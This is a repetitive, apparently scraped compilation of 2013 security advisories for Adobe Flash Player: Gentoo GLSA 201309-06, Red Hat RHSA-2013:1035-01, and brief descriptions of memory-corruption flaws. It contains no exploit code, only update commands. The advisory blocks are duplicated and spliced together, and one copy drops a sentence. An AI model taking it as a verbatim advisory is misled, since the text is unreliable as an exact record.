http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1378 [ 89 ] CVE-2013-1379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1379 [ 90 ] CVE-2013-1380 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1380 [ 91 ] CVE-2013-2555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2555 [ 92 ] CVE-2013-2728 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2728 [ 93 ] CVE-2013-3343 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3343 [ 94 ] CVE-2013-3344 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3344 [ 95 ] CVE-2013-3345 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3345 [ 96 ] CVE-2013-3347 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3347 [ 97 ] CVE-2013-3361 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3361 [ 98 ] CVE-2013-3362 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3362 [ 99 ] CVE-2013-3363 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3363 [ 100 ] CVE-2013-5324 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5324 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201309-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2013:1035-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1035.html Issue date: 2013-07-10 CVE Names: CVE-2013-3344 CVE-2013-3345 CVE-2013-3347 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes three security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security bulletin APSB13-17, listed in the References section. Specially-crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code when a victim loads a page containing the malicious SWF content. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 982749 - CVE-2013-3344 CVE-2013-3345 CVE-2013-3347 flash-plugin: Multiple code execution flaws (APSB13-17) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.297-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.297-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.297-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.297-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2013-3344.html https://www.redhat.com/security/data/cve/CVE-2013-3345.html https://www.redhat.com/security/data/cve/CVE-2013-3347.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb13-17.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFR3RcFXlSAg2UNWIIRAibqAJ4ueutMxMCpS7cVyM01x68cJzonJwCgwGMI wOssXF1MQp0avKW9aWq5yP8= =2PBY -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Heap-based buffer overflow in Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code via unspecified vectors. Note: This issue was previously covered in BID 61038 (Adobe Flash Player APSB13-17 Multiple Remote Code Execution Vulnerabilities), but has been moved to its own record for better documentation. Failed attempts will likely cause a denial-of-service condition. The product enables viewing of applications, content and video across screens and browsers. Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could entice a user to open specially crafted SWF content, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. Furthermore, a remote attacker may be able to bypass access restrictions. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.310" References ========== [ 1 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248 [ 2 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248 [ 3 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249 [ 4 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249 [ 5 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250 [ 6 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250 [ 7 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251 [ 8 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251 [ 9 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252 [ 10 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252 [ 11 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253 [ 12 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253 [ 13 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254 [ 14 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254 [ 15 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255 [ 16 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255 [ 17 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256 [ 18 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256 [ 19 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257 [ 20 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257 [ 21 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258 [ 22 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258 [ 23 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259 [ 24 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259 [ 25 ] CVE-2012-5260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260 [ 26 ] CVE-2012-5260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260 [ 27 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261 [ 28 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261 [ 29 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262 [ 30 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262 [ 31 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263 [ 32 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263 [ 33 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264 [ 34 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264 [ 35 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265 [ 36 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265 [ 37 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266 [ 38 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266 [ 39 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267 [ 40 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267 [ 41 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268 [ 42 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268 [ 43 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269 [ 44 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269 [ 45 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270 [ 46 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270 [ 47 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271 [ 48 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271 [ 49 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272 [ 50 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272 [ 51 ] CVE-2012-5274 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5274 [ 52 ] CVE-2012-5275 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5275 [ 53 ] CVE-2012-5276 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5276 [ 54 ] CVE-2012-5277 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5277 [ 55 ] CVE-2012-5278 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5278 [ 56 ] CVE-2012-5279 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5279 [ 57 ] CVE-2012-5280 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5280 [ 58 ] CVE-2012-5676 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5676 [ 59 ] CVE-2012-5677 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5677 [ 60 ] CVE-2012-5678 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5678 [ 61 ] CVE-2013-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0504 [ 62 ] CVE-2013-0630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0630 [ 63 ] CVE-2013-0633 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0633 [ 64 ] CVE-2013-0634 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0634 [ 65 ] CVE-2013-0637 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0637 [ 66 ] CVE-2013-0638 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0638 [ 67 ] CVE-2013-0639 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0639 [ 68 ] CVE-2013-0642 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0642 [ 69 ] CVE-2013-0643 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0643 [ 70 ] CVE-2013-0644 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0644 [ 71 ] CVE-2013-0645 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0645 [ 72 ] CVE-2013-0646 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0646 [ 73 ] CVE-2013-0647 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0647 [ 74 ] CVE-2013-0648 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0648 [ 75 ] CVE-2013-0649 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0649 [ 76 ] CVE-2013-0650 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0650 [ 77 ] CVE-2013-1365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1365 [ 78 ] CVE-2013-1366 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1366 [ 79 ] CVE-2013-1367 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1367 [ 80 ] CVE-2013-1368 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1368 [ 81 ] CVE-2013-1369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1369 [ 82 ] CVE-2013-1370 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1370 [ 83 ] CVE-2013-1371 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1371 [ 84 ] CVE-2013-1372 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1372 [ 85 ] CVE-2013-1373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1373 [ 86 ] CVE-2013-1374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1374 [ 87 ] CVE-2013-1375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1375 [ 88 ] CVE-2013-1378 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1378 [ 89 ] CVE-2013-1379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1379 [ 90 ] CVE-2013-1380 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1380 [ 91 ] CVE-2013-2555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2555 [ 92 ] CVE-2013-2728 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2728 [ 93 ] CVE-2013-3343 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3343 [ 94 ] CVE-2013-3344 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3344 [ 95 ] CVE-2013-3345 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3345 [ 96 ] CVE-2013-3347 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3347 [ 97 ] CVE-2013-3361 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3361 [ 98 ] CVE-2013-3362 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3362 [ 99 ] CVE-2013-3363 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3363 [ 100 ] CVE-2013-5324 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5324 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201309-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2013:1035-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1035.html Issue date: 2013-07-10 CVE Names: CVE-2013-3344 CVE-2013-3345 CVE-2013-3347 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes three security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. These vulnerabilities are detailed in the Adobe Security bulletin APSB13-17, listed in the References section. Specially-crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code when a victim loads a page containing the malicious SWF content. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 982749 - CVE-2013-3344 CVE-2013-3345 CVE-2013-3347 flash-plugin: Multiple code execution flaws (APSB13-17) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.297-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.297-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.297-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.297-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2013-3344.html https://www.redhat.com/security/data/cve/CVE-2013-3345.html https://www.redhat.com/security/data/cve/CVE-2013-3347.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb13-17.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFR3RcFXlSAg2UNWIIRAibqAJ4ueutMxMCpS7cVyM01x68cJzonJwCgwGMI wOssXF1MQp0avKW9aWq5yP8= =2PBY -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. Adobe Flash Player is prone to an unspecified memory-corruption vulnerability. Note: This issue was previously covered in BID 61038 (Adobe Flash Player APSB13-17 Multiple Remote Code Execution Vulnerabilities), but has been moved to its own record for better documentation. Attackers can exploit this issue to execute arbitrary code within the context of the user running the affected application. Failed attempts will likely cause a denial-of-service condition. The product enables viewing of applications, content and video across screens and browsers. Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could entice a user to open specially crafted SWF content, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. Furthermore, a remote attacker may be able to bypass access restrictions. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.310" References ========== [ 1 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248 [ 2 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248 [ 3 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249 [ 4 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249 [ 5 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250 [ 6 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250 [ 7 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251 [ 8 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251 [ 9 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252 [ 10 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252 [ 11 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253 [ 12 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253 [ 13 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254 [ 14 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254 [ 15 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255 [ 16 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255 [ 17 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256 [ 18 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256 [ 19 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257 [ 20 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257 [ 21 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258 [ 22 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258 [ 23 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259 [ 24 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259 [ 25 ] CVE-2012-5260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260 [ 26 ] CVE-2012-5260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260 [ 27 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261 [ 28 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261 [ 29 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262 [ 30 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262 [ 31 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263 [ 32 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263 [ 33 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264 [ 34 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264 [ 35 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265 [ 36 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265 [ 37 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266 [ 38 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266 [ 39 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267 [ 40 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267 [ 41 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268 [ 42 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268 [ 43 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269 [ 44 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269 [ 45 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270 [ 46 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270 [ 47 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271 [ 48 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271 [ 49 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272 [ 50 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272 [ 51 ] CVE-2012-5274 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5274 [ 52 ] CVE-2012-5275 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5275 [ 53 ] CVE-2012-5276 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5276 [ 54 ] CVE-2012-5277 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5277 [ 55 ] CVE-2012-5278 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5278 [ 56 ] CVE-2012-5279 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5279 [ 57 ] CVE-2012-5280 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5280 [ 58 ] CVE-2012-5676 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5676 [ 59 ] CVE-2012-5677 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5677 [ 60 ] CVE-2012-5678 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5678 [ 61 ] CVE-2013-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0504 [ 62 ] CVE-2013-0630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0630 [ 63 ] CVE-2013-0633 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0633 [ 64 ] CVE-2013-0634 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0634 [ 65 ] CVE-2013-0637 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0637 [ 66 ] CVE-2013-0638 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0638 [ 67 ] CVE-2013-0639 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0639 [ 68 ] CVE-2013-0642 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0642 [ 69 ] CVE-2013-0643 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0643 [ 70 ] CVE-2013-0644 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0644 [ 71 ] CVE-2013-0645 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0645 [ 72 ] CVE-2013-0646 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0646 [ 73 ] CVE-2013-0647 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0647 [ 74 ] CVE-2013-0648 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0648 [ 75 ] CVE-2013-0649 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0649 [ 76 ] CVE-2013-0650 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0650 [ 77 ] CVE-2013-1365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1365 [ 78 ] CVE-2013-1366 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1366 [ 79 ] CVE-2013-1367 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1367 [ 80 ] CVE-2013-1368 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1368 [ 81 ] CVE-2013-1369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1369 [ 82 ] CVE-2013-1370 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1370 [ 83 ] CVE-2013-1371 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1371 [ 